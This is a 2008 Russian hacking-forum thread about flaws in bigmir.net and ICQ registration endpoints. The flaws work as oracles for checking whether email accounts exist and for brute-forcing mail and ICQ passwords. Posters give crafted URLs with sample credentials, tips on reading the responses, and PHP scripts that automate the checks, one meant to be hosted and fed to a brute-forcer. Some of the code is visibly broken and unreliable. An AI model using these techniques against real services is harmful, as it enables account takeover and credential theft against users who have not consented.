Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
20.05.2008, 20:10
|
|
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086
Репутация:
135
|
|
Баги bigmir.net
#1
Bag name: regisration mail (no pic)
http://coregs.bigmir.net/?connectorId=_icqFlashConnector&eStage=1&uin=0&key =05CD194AA8D3C6158478A5C8E7BF1692C5386EE725079A146 70F16CC647A70B1F8A9C9FC715DF466D6DD3555E3ED483227C 27752F445C9C40BE6C013D88143934F6E87F782F3C5BF0DACC D365CD4FBB96B194553955EDED603ED920667DA0516&pass=5 21338&fname=&lname=&s=0&nick=&quest_str=%CD%EE%EC% E5%F0%20%EF%E0%F1%EF%EE%F0%F2%E0&answer=678345&day =0&month=0&year=0&country=380&city=10101&login=hgh jjhgfhhg
Login: hghjhg
Passwd: 521338
#2
Bag name: Check mail in valid (speed)
http://passport.bigmir.net/js/free.js?0::login=gdfgfdgdf
Login: gdfgfdgdf
если ответ true то значит мыло свободное
#3
Bag name: Brut mail ( speed and ecomon traffic)
http://www.icq.com/xtraz/products/coreg/Cactus/php/checkLspDetails.php?distid=10100&ver=2052&username =supdport@bigmir.net&password=521338
Mail: supdport@bigmir.net
Passwd: 521338
если ответ времери 1 то значит пароль верный, если 2 то пасс неверный
#4 Bag name: Brut mail 2 (high speed)
http://coreg.bigmir.net/?uin=0&r_type=2&email=rjzidomf@bigmir.net&pass=sta ssats&subm=1
Mail: rjzidomf@bigmir.net
Passwd: stassats
В ответе хедера Content-Length: можна написать скоросной брут мыл
если розмер больше 2000 то пароль правельный, соотвецтвенно если меньше то пароль неправльный
Found by WEB-DEFENCE.RU
Последний раз редактировалось КВР; 21.05.2008 в 19:36..
|
|
|
21.05.2008, 14:47
|
|
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086
Репутация:
135
|
|
Немного оптимизировал процесс.
для бага #2(
Bag name: Check mail in valid (speed))
PHP код:
<?
echo "<pre>\n";
@set_time_limit(0);
@ini_set("display_errors","0");
$hostname = gethostbyname('passport.bigmir.net');
function login($login)
{
global $hostname;
$responce = "";
$fsock = fsockopen($hostname,80,$errnum,$errstr,2);
$headers = "GET http://passport.bigmir.net/js/free.js?0::login=$login HTTP/1.1\n";
$headers .= "Host: passport.bigmir.net\n";
$headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";
$headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
$headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";
$headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";
$headers .= "Keep-Alive: 500\n";
$headers .= "Connection: close\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
fwrite ($fsock,$headers);
while (!feof($fsock)) $responce .= fread($fsock,1024);
fclose ($fsock);
if(preg_match($responce, $rez)) echo $rez[1]; else echo 'Something not right...';
//echo $responce;
}
login("gdfgfdgdf");
echo "</pre>";
?>
Code by WEB-DEFENCE.RU
Последний раз редактировалось КВР; 21.05.2008 в 19:37..
|
|
|
|
21.05.2008, 15:00
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
О нормально.
Магу-Волшебнику привет =)) бигмир нет и не будет :lol:
|
|
|
|
21.05.2008, 17:27
|
|
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086
Репутация:
135
|
|
*Demo версия скрипта для перебора паролей через баг №3.
- Устанавливаем скрипт на север.
- берём любой брутфорсер травим на скрипт.
PHP код:
<?
//Web-DEFENCe.rU
$name='';
$pass='';
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass)
exit("<b>Access Denied</b>");
}
}
global $hostname;
$responce = "";
$fsock = fsockopen($hostname,80,$errnum,$errstr,2);
$headers = "GET http://www.icq.com/xtraz/products/coreg/Cactus/php/checkLspDetails.php?distid=10100&ver=2052&username=$name@bigmir.net&password=$pass HTTP/1.1\n";
$headers .= "Host: passport.bigmir.net \n";
$headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";
$headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
$headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";
$headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";
$headers .= "Keep-Alive: 500\n";
$headers .= "Connection: close\n";
fwrite ($fsock,$headers);
while (!feof($fsock)) $responce .= fread($fsock,1024);
fclose ($fsock);
if(preg_match($responce, $rez)) echo $rez[1];
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>Верный пасс.</title>
<style type="text/css">
<style type="text/css" media="all">
<?
echo ($name:$pass);
?>
Code by WEB-DEFENCE.RU
Последний раз редактировалось КВР; 21.05.2008 в 19:37..
|
|
|
|
23.05.2008, 14:16
|
|
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086
Репутация:
135
|
|
_https://coregs.bigmir.net/?utf8=yes&connectorId=_icqFlashConnector&connector Id=_icqFlashConnector&eStage=1&uin=475456491&key=8 AE2D84F5AC8C414B11A73672505266B9693A34372FE5C77068 5D1D4DF67726D72EB27E3D72999AF6629070B2CAB84FA806CF 20C7EB3420043509E1DC0DDA0603E0C806318D201598EE0F00 5506A5A7BD8EE4AF2AD0E5B25EC65EB7B4A3458ED&pass=521 339&fname=&lname=&s=0&nick=&quest_str=?%92?%B0N??% B5%20?%BBNZ?%B1???????%B5%20N%87??N??%BB???&quest_ str=?%92?%B0N??%B5%20?%BBNZ?%B1???????%B5%20N%87?? N??%BB???&answer=ffffgdf&day=0&month=0&year=0&coun try=380&city=10101&login=hjfjttffgghktf
если пароль подходит к асе то рега "ок" если нет то ошибка под номером 5.
|
|
|
|
24.05.2008, 03:05
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от КВР
_https://coregs.bigmir.net/?utf8=yes&connectorId=_icqFlashConnector&connector Id=_icqFlashConnector&eStage=1&uin=475456491&key=8 AE2D84F5AC8C414B11A73672505266B9693A34372FE5C77068 5D1D4DF67726D72EB27E3D72999AF6629070B2CAB84FA806CF 20C7EB3420043509E1DC0DDA0603E0C806318D201598EE0F00 5506A5A7BD8EE4AF2AD0E5B25EC65EB7B4A3458ED&pass=521 339&fname=&lname=&s=0&nick=&quest_str=?%92?%B0N??% B5%20?%BBNZ?%B1???????%B5%20N%87??N??%BB???&quest_ str=?%92?%B0N??%B5%20?%BBNZ?%B1???????%B5%20N%87?? N??%BB???&answer=ffffgdf&day=0&month=0&year=0&coun try=380&city=10101&login=hjfjttffgghktf
если пароль подходит к асе то рега "ок" если нет то ошибка под номером 5.
Никакого заголовка не возвращяет эта ссылка 
И пробелы убирал и т.д...
Просто пустая страница
А так по идее можно перебирать пароль к любой аське без прокси я так понимаю?
|
|
|
|
24.05.2008, 18:43
|
|
Познающий
Регистрация: 23.04.2008
Сообщений: 39
Провел на форуме:
198086
Репутация:
135
|
|
Nightmarе, разбери ссылку на логические куски.
Заполни свои логин пасс в нужных местах.
Если заполнено верно вернёт "ок".
Если не верно то пустую страницу.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
